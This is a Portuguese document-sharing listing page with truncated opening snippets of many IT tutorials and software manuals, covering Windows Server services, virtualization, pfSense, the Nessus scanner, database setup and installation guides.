Instalando o IIS 7 no Windows Server 2008 Goiânia, 16/09/2013 Aluno: Rafael Vitor Prof. Kelly Instalando o IIS 7 no Windows Server 2008 Objetivo Esse tutorial tem como objetivo demonstrar como instalar e configurar o IIS 7.0 no Windows Server

Leia mais

INSTALAÇÃO DE SOFTWARES ÚTEIS EM ENGENHARIA CARTOGRÁFICA

INSTALAÇÃO DE SOFTWARES ÚTEIS EM ENGENHARIA CARTOGRÁFICA INSTALAÇÃO DE SOFTWARES ÚTEIS EM ENGENHARIA CARTOGRÁFICA Primeiramente é importante observar a importância do desenvolvimento de softwares específicos para agilizar o trabalho do Engenheiro Cartógrafo.

Leia mais

AULA 7: SERVIDOR DHCP EM WINDOWS SERVER

AULA 7: SERVIDOR DHCP EM WINDOWS SERVER AULA 7: SERVIDOR DHCP EM WINDOWS SERVER Objetivo: Instalar e detalhar o funcionamento de um Servidor de DHCP (Dynamic Host Configuration Protocol) no sistema operacional Microsoft Windows 2003 Server.

Leia mais

TUTORIAL VMWARE WORKSTATION 8. Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial

TUTORIAL VMWARE WORKSTATION 8. Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial TUTORIAL VMWARE WORKSTATION 8 Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial INTRODUÇÃO O uso de máquinas virtuais pode ser adequado tanto

Leia mais

Faculdade de Tecnologia SENAC Goiás. Disciplina: Gerenciamento de Rede de Computadores. Goiânia, 16 de novembro de 2014.

Faculdade de Tecnologia SENAC Goiás. Disciplina: Gerenciamento de Rede de Computadores. Goiânia, 16 de novembro de 2014. Faculdade de Tecnologia SENAC Goiás Disciplina: Gerenciamento de Rede de Computadores : Goiânia, 16 de novembro de 2014. Faculdade de Tecnologia SENAC Goiás Professor: Marissol Martins Alunos: Edy Laus,

Leia mais

FANESE Faculdade de Administração e Negócios de Sergipe

FANESE Faculdade de Administração e Negócios de Sergipe I FANESE Faculdade de Administração e Negócios de Sergipe GERENCIAMENTO DE PATCHES Atualizações de segurança Aracaju, Agosto de 2009 DAYSE SOARES SANTOS LUCIELMO DE AQUINO SANTOS II GERENCIAMENTO DE PATCHES

Leia mais

Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL

Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL Prof. MSc. Hugo Souza Iniciando nossas aulas sobre

Leia mais

Instruções de Instalação do SciFinder Scholar 2007

Instruções de Instalação do SciFinder Scholar 2007 Instruções de Instalação do SciFinder Scholar 2007 Neste arquivo estão listadas as instruções para a instalação da interface de busca na Base SciFinder Scholar, versão 2007. Vale lembrar que esta instalação

Leia mais

MANUAL DO USUÁRIO. AssetView FDT. AssetView FDT

MANUAL DO USUÁRIO. AssetView FDT. AssetView FDT MANUAL DO USUÁRIO AssetView FDT AssetView FDT A S T V W F D T M P www.smar.com.br Especificações e informações estão sujeitas a modificações sem prévia consulta. Informações atualizadas dos endereços estão

Leia mais

Introdução ao Sistema. Características

Introdução ao Sistema. Características Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados

Leia mais

Secure Client. Manual do Usuário. IPNv2. Secure Client IPNv2

Secure Client. Manual do Usuário. IPNv2. Secure Client IPNv2 Secure Client Manual do Usuário IPNv2 Índice 2 de 23 1. APRESENTAÇÃO... 3 2. OBJETIVO, APLICAÇÃO E DEFINIÇÕES... 4 a. Objetivos... 4 b. Aplicação... 4 c. Regras do sistema... 4 d. Configuração de hardware

Leia mais

Manual de Instalação

Manual de Instalação Manual de Instalação Sumário 1. Sobre este documento... 3 2. Suporte técnico... 3 3. Requisitos de hardware... 4 3.1. Estação... 4 3.2. Servidor... 4 4. Instalação... 5 4.1. Instalação no servidor... 5

Leia mais

Manual de Instalação Flex

Manual de Instalação Flex Manual de Instalação Flex Sumário 1. Sobre este documento... 3 2. Suporte técnico... 3 3. Requisitos de hardware... 4 4. Instalação... 5 4.1. Instalação no servidor... 5 4.1.1. Instalação do sistema...

Leia mais

Acessando um Banco de Dados

Acessando um Banco de Dados Acessando um Banco de Dados Introdução Agora que você já está craque em JSP e já instalou seu servidor, vamos direto para a parte prática! Neste tutorial vamos aprender a acessar um banco de dados. Para

Leia mais

Acesso Remoto Placas de captura

Acesso Remoto Placas de captura Acesso Remoto Placas de captura 1 instalar o DVR Siga os passos de instalação informados na caixa do produto, após seu perfeito funcionamento vá para próximo passo. 2 Configurá-lo na rede Local O computador

Leia mais

Rotina de Discovery e Inventário

Rotina de Discovery e Inventário 16/08/2013 Rotina de Discovery e Inventário Fornece orientações necessárias para testar a rotina de Discovery e Inventário. Versão 1.0 01/12/2014 Visão Resumida Data Criação 01/12/2014 Versão Documento

Leia mais

Nessus Vulnerability Scanner

Nessus Vulnerability Scanner Faculdade de Tecnologia SENAC-RS Disciplina de Segurança em Redes Ferramentas de Segurança Nessus Vulnerability Scanner Nome: Rafael Victória Chevarria Novembro de 2013. 1. Introdução Nessus é um scanner

Leia mais

AULA 6: SERVIDOR DNS EM WINDOWS SERVER

AULA 6: SERVIDOR DNS EM WINDOWS SERVER AULA 6: SERVIDOR DNS EM WINDOWS SERVER Objetivo: Instalar e detalhar o funcionamento de um Servidor de DNS (Domain Name System) no sistema operacional Microsoft Windows 2003 Server. Ferramentas: - ISO

Leia mais

Apresentação Figura 01:

Apresentação Figura 01: Apresentação O Sistema Online de Iniciação Científica da Universidade do Estado foi desenvolvido pela Pró- Reitoria de Pesquisa e Ensino de Pós-Graduação (PPG) com a finalidade de agilizar o processo de

Leia mais

Guia Rápido de Instalação

Guia Rápido de Instalação Guia Rápido de Instalação Conteúdo Passo 1 Download dos Arquivos de Instalação Passo 2 Tela de Boas Vindas Passo 3 Termos de Licença Passo 4 Local de Instalação Passo 5 Informações de Registro Passo 6

Leia mais

Procedimentos para Reinstalação do Sisloc

Procedimentos para Reinstalação do Sisloc Procedimentos para Reinstalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Criação de backups importantes... 3 3. Reinstalação do Sisloc... 4 Passo a passo... 4 4. Instalação da base de dados Sisloc...

Leia mais

Procedimentos para Configuração do Ambiente J2EE e J2SE em Ambiente Windows

Procedimentos para Configuração do Ambiente J2EE e J2SE em Ambiente Windows Procedimentos para Configuração do Ambiente J2EE e J2SE em Ambiente Windows 1 - Configuração do J2SDKSE (Java 2 SDK Standard Edition) Deve-se obter o arquivo j2sdk-1_4_2_03-windows-i586-p.exe ou mais recente

Leia mais

Manual do Usuário Android Neocontrol

Manual do Usuário Android Neocontrol Manual do Usuário Android Neocontrol Sumário 1.Licença e Direitos Autorais...3 2.Sobre o produto...4 3. Instalando, Atualizando e executando o Android Neocontrol em seu aparelho...5 3.1. Instalando o aplicativo...5

Leia mais

ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL

ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL Documento: Tutorial Autor: Iuri Sonego Cardoso Data: 27/05/2005 E-mail: iuri@scripthome.cjb.net Home Page: http://www.scripthome.cjb.net ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL

Leia mais

Este tutorial está publicado originalmente em http://www.baboo.com.br/absolutenm/anmviewer.asp?a=30405&z=300

Este tutorial está publicado originalmente em http://www.baboo.com.br/absolutenm/anmviewer.asp?a=30405&z=300 WinRAR: Conheça este excelente compactador de arquivos Introdução: É fato que a Internet está mais rápida com a popularização da banda larga, mas os compactadores de arquivos ainda apresentam muita utilidade

Leia mais

Aplicação Prática de Lua para Web

Aplicação Prática de Lua para Web Aplicação Prática de Lua para Web Aluno: Diego Malone Orientador: Sérgio Lifschitz Introdução A linguagem Lua vem sendo desenvolvida desde 1993 por pesquisadores do Departamento de Informática da PUC-Rio

Leia mais

1. INTRODUÇÃO 3 2. ESCOPO DO SERVIÇO DE CUSTOMIZAÇÃO 3

1. INTRODUÇÃO 3 2. ESCOPO DO SERVIÇO DE CUSTOMIZAÇÃO 3 2 ÍNDICE 1. INTRODUÇÃO 3 2. ESCOPO DO SERVIÇO DE CUSTOMIZAÇÃO 3 2.1. OBJETIVO DOS SERVIÇOS DE CUSTOMIZAÇÕES 3 2.2. NÃO SE COMPREENDE COMO SERVIÇOS DE CUSTOMIZAÇÕES 3 2.3. RESPONSABILIDADE SOBRE ARTEFATOS

Leia mais

3 Um Framework Orientado a Aspectos para Monitoramento e Análise de Processos de Negócio

3 Um Framework Orientado a Aspectos para Monitoramento e Análise de Processos de Negócio 32 3 Um Framework Orientado a Aspectos para Monitoramento e Análise de Processos de Negócio Este capítulo apresenta o framework orientado a aspectos para monitoramento e análise de processos de negócio

Leia mais

Gerenciamento de Redes de Computadores. Pfsense Introdução e Instalação

Gerenciamento de Redes de Computadores. Pfsense Introdução e Instalação Pfsense Introdução e Instalação Introdução A utilização de um firewall em uma rede de computadores possui o objetivo básico de proteção relacionado a entrada e saída de dados. Introdução O pfsense é um

Leia mais

Guia de conexão na rede wireless

Guia de conexão na rede wireless 1 Guia de conexão na rede wireless Este documento tem por objetivo orientar novos usuários, não ambientados aos procedimentos necessários, a realizar uma conexão na rede wireless UFBA. A seguir, será descrito

Leia mais

Trabalhando com NAT no PFSense

Trabalhando com NAT no PFSense Trabalhando com NAT no PFSense Este artigo está sendo feito para Divulgar o Curso PFSense presencial, que irá ocorrer em fevereiro 23, com duração de 10 dias, indo até dia 6 de Março, com horário entre

Leia mais

Instalação do VOL Backup para Sistemas Unix-Like

Instalação do VOL Backup para Sistemas Unix-Like Este é o guia de instalação e configuração da ferramenta VOL Backup para Sistemas Unix-Like. Deve ser seguido caso você queira instalar ou reinstalar o VOL Backup em sistemas Linux, Solaris ou BSD. Faça

Leia mais

TUTORIAL DE UTILIZAÇÃO. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096

TUTORIAL DE UTILIZAÇÃO. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096 TUTORIAL DE UTILIZAÇÃO Índice Geral Antes de Começar 2 Procedimento de Instalação 3 Exportar dados para o 8 Acesso ao 10 Ordens de Serviço no 11 Solicitações de Serviço no 17 Folhas de Inspeção no 19 Importar

Leia mais

Instalação Mesa Virtual 2.0 Impacta

Instalação Mesa Virtual 2.0 Impacta Instalação Mesa Virtual 2.0 Impacta Esse documento descreve os passos necessários para a correta instalação e configuração inicial do software Mesa Virtual 2.0 funcionando com uma central PABX Impacta.

Leia mais

Backup dos Bancos de Dados Interbase

Backup dos Bancos de Dados Interbase Backup dos Bancos de Dados Interbase Interbase... O que é? InterBase é um gerenciador de Banco de dados relacionais da Borland. O Interbase é uma opção alternativa aos bancos de dados tradicionais como

Leia mais

Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP

Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Paulo Fernando da Silva psilva@senior.com.br Sérgio Stringari stringari@furbbr Resumo. Este artigo apresenta a especificação

Leia mais

Guia de instalação Command WorkStation 5.5 com o Fiery Extended Applications 4.1

Guia de instalação Command WorkStation 5.5 com o Fiery Extended Applications 4.1 Guia de instalação Command WorkStation 5.5 com o Fiery Extended Applications 4.1 Sobre o Fiery Extended Applications O Fiery Extended Applications (FEA) 4.1 é um pacote dos seguintes aplicativos para uso

Leia mais

software CRON Central de Relacionamento On-Line que consiste em um software completo de gerenciamento de

software CRON Central de Relacionamento On-Line que consiste em um software completo de gerenciamento de Este manual foi elaborado a fim de orientar e auxiliar nossos colaboradores na instalação e manuseio do software CRON Central de Relacionamento On-Line que consiste em um software completo de gerenciamento

Leia mais

Manual de Instalação e Configuração. Módulo Remote. (G2KA) para NFSE. v1.0

Manual de Instalação e Configuração. Módulo Remote. (G2KA) para NFSE. v1.0 Manual de Instalação e Configuração Módulo Remote (G2KA) para NFSE v1.0 Página 1 Sumário 1 Download e Instalação... 3 2 Configuração... 5 3 Inicialização Manual... 8 4 Inicialização via serviço do Windows...

Leia mais

Manual de Instalação

Manual de Instalação Manual de Instalação Sumário 1. Sobre este documento...3 2. Suporte técnico...3 3. Requisitos de hardware...3 3.1. Estação...3 3.2. Servidor...4 4. Instalação...4 4.1. Instalação do Group Folha no servidor...6

Leia mais

Manual de Instalação Corporate

Manual de Instalação Corporate Manual de Instalação Corporate Sumário 1. Sobre este documento...3 2. Suporte técnico...3 3. Requisitos de hardware...3 3.1. Estação...3 3.2. Servidor...4 4. Instalação...4 4.1. Instalação do Imobiliária21

Leia mais

www.neteye.com.br NetEye Guia de Instalação

www.neteye.com.br NetEye Guia de Instalação www.neteye.com.br NetEye Guia de Instalação Índice 1. Introdução... 3 2. Funcionamento básico dos componentes do NetEye...... 3 3. Requisitos mínimos para a instalação dos componentes do NetEye... 4 4.

Leia mais

Manual de Instalação e Configuração do SQL Express

Manual de Instalação e Configuração do SQL Express Manual de Instalação e Configuração do SQL Express Data alteração: 19/07/11 Pré Requisitos: Acesse o seguinte endereço e faça o download gratuito do SQL SRVER EXPRESS, conforme a sua plataforma x32 ou

Leia mais

Obs: É necessário utilizar um computador com sistema operacional Windows 7.

Obs: É necessário utilizar um computador com sistema operacional Windows 7. Instalando os Pré-Requisitos Os arquivos dos 'Pré-Requisitos' estão localizados na pasta Pré-Requisitos do CD HyTracks que você recebeu. Os arquivos também podem ser encontrados no servidor. (www.hytracks.com.br/pre-requisitos.zip).

Leia mais

Versão Liberada. www.gerpos.com.br. Gerpos Sistemas Ltda. info@gerpos.com.br. Av. Jones dos Santos Neves, nº 160/174

Versão Liberada. www.gerpos.com.br. Gerpos Sistemas Ltda. info@gerpos.com.br. Av. Jones dos Santos Neves, nº 160/174 Versão Liberada A Gerpos comunica a seus clientes que nova versão do aplicativo Gerpos Retaguarda, contendo as rotinas para emissão da Nota Fiscal Eletrônica, já está disponível. A atualização da versão

Leia mais

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started.

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started. 1 - Como obter seu DNS Dinâmico no No-IP O No-IP, é um sistema de DNS (Domain Name Server), que converte o seu endereço IP em um nome. O que o No-IP faz, é converter o nome do tipo minhacameraip.no-ip.org

Leia mais

NFe Nota Fiscal Eletronica

NFe Nota Fiscal Eletronica 1 NFe Nota Fiscal Eletronica Introdução O NFe Tron, apesar de ser um sistema complexo, possui um método simples de instalação, configurando todos os elementos necessários para o funcionamento básico do

Leia mais

O serviço de Gateway Remoto é instalado em um computador, onde um ou diversos rádios móveis Hytera podem ser conectados via cabo USB e áudio.

O serviço de Gateway Remoto é instalado em um computador, onde um ou diversos rádios móveis Hytera podem ser conectados via cabo USB e áudio. Visão Geral O Gateway Remoto Hytracks tem por objetivo atuar como uma extensão do Servidor principal, visando atender regiões muito distantes do servidor através de um link IP. O serviço de Gateway Remoto

Leia mais

Guia de Atualização TOTVS Segurança e Acesso 12.1

Guia de Atualização TOTVS Segurança e Acesso 12.1 06/2015 Sumário 1 Prefácio... 3 1.2 Finalidade... 3 1.3 Público Alvo... 3 1.4 Organização deste Guia... 3 1.5 Documentações Importantes... 3 2 Atualização... 4 2.1 Executando o Updater de Atualização...

Leia mais

Objetivo. Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado).

Objetivo. Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado). Sitef - Instalação Objetivo Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado). O que é Sitef? O SiTef (ou tef dedicado) é um conjunto

Leia mais

Processo de Envio de email

Processo de Envio de email Processo de Envio de email Introdução O envio de documentos de forma eletrônica vem sendo muito utilizado, assim o envio de arquivos, relatórios, avisos, informações é realizado via e-mail. O sistema disponibiliza

Leia mais